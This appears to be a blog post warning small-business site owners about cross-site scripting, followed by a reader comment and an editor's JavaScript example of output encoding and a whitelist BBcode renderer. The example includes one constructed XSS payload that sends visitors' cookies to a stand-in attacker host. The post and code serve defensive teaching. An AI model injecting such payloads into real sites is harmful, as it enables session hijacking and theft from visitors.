If you have a web site that does not capture information and only displays information to people visiting it, you can breathe a small sigh of relief: most likely your web site is pretty secure, as long as the server and software it runs on are kept patched. However, if your web site captures information (as in ecommerce, forms, an online database), you could have a back door for hackers to access your web site data and, if your web site is connected to your network, to also gain access to your network.

ConnectITNews writes that Jeremiah Grossman, WhiteHat founder and CTO, noted that any site that takes user-supplied content usually has some kind of cross-site scripting vulnerability. He explained that cross-site scripting lets the bad guys leverage the trust of a public or well-known website to exploit users to do things like execute web worms or "phishing super bait", where a scammer might overlay credit-card-stealing code over a real website rather than a fake one.
I’m not a security specialist and you’re not either.

There are a few things you can do to better protect yourself:
1. When your web developer creates an application for you, ensure they have some background in security and can "program securely": at a minimum, treating every value a visitor submits as untrusted and encoding it before it is written back into a page.
2. Ask a third party to test your web site for vulnerabilities. Companies like ScanAlert provide services that continuously scan your web site and report to you on any problems they find.
3. As you do more and more business online, you might want to consider hiring a full-time security expert or, at the very least, having one on retainer who can work with you and knows how to properly implement tools and services to keep your web site secure.

    Another way to defend against XSS is disabling HTML code at the point where someone can enter text.
    If you need to allow someone to enter code along with their text you should create something similar to BBcode, but you will need to check the outputs regularly to avoid being compromised. Time consuming for a large site.
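The cross-site scripting problem Grossman describes, and the "disable HTML, offer BBcode instead" approach in the comment above, come down to one rule at the point where visitor text is written back into a page. The following is an added example by the editor, not code from the original post or from the commenter: it shows the raw-echo pattern that creates the hole, the same output with HTML encoding applied, and a small BBcode-style renderer that escapes the text first and only then re-enables a short whitelist of tags. The function names, the `http(s)`-only link rule and the sample comment text are all the editor's assumptions.

```javascript
// Added example (not from the original post or the commenter). Function
// names, the whitelist and the sample comment are hypothetical.

// Constructed sample of attacker-supplied comment text: the classic
// cookie-stealing payload dropped into a comment field.
const COMMENT = 'Nice site! <script>document.location="http://evil.example/?c="+document.cookie</script>';

// Vulnerable: the visitor's text is interpolated straight into the page, so
// any <script> they typed executes in every other visitor's browser.
function renderUnsafe(userText) {
  return `<div class="comment">${userText}</div>`;
}

// Encode the five characters that let text break out of an HTML text node or
// a double-quoted attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: every character of user text is encoded before it reaches HTML.
// The browser shows the <script> tag as literal text instead of running it.
function renderSafe(userText) {
  return `<div class="comment">${escapeHtml(userText)}</div>`;
}

// BBcode-style markup, the compromise the comment suggests: escape first, then
// translate only a whitelist of tags. Because the escape pass already ran, the
// visitor cannot smuggle raw HTML through, and the [url] rule only accepts
// http(s) links, so "javascript:" URLs are left as inert text.
function renderBBCode(userText) {
  let html = escapeHtml(userText);
  html = html.replace(/\[b\](.*?)\[\/b\]/gs, '<b>$1</b>');
  html = html.replace(/\[i\](.*?)\[\/i\]/gs, '<i>$1</i>');
  // The href stays inside double quotes; escapeHtml has already turned any
  // literal quote in the URL into &quot;, so the attribute cannot be closed early.
  html = html.replace(
    /\[url=(https?:\/\/[^\]\s]+)\](.*?)\[\/url\]/gs,
    '<a href="$1" rel="nofollow">$2</a>'
  );
  return `<div class="comment">${html}</div>`;
}

// Quick check a site owner could run over rendered output: does a raw
// <script tag survive into the HTML?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe :', containsScriptTag(renderUnsafe(COMMENT)));   // true
console.log('safe   :', containsScriptTag(renderSafe(COMMENT)));     // false
console.log('bbcode :', renderBBCode('[b]Hello[/b] [url=https://example.com/?a=1&b=2]link[/url]'));
```

The order of operations in `renderBBCode` is the whole point: encoding happens before tag translation, so the only HTML that can appear in the output is what the renderer itself emits. Reversing the two steps, or allowing a `[url]` scheme other than http(s), reopens the hole the comment warns about.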
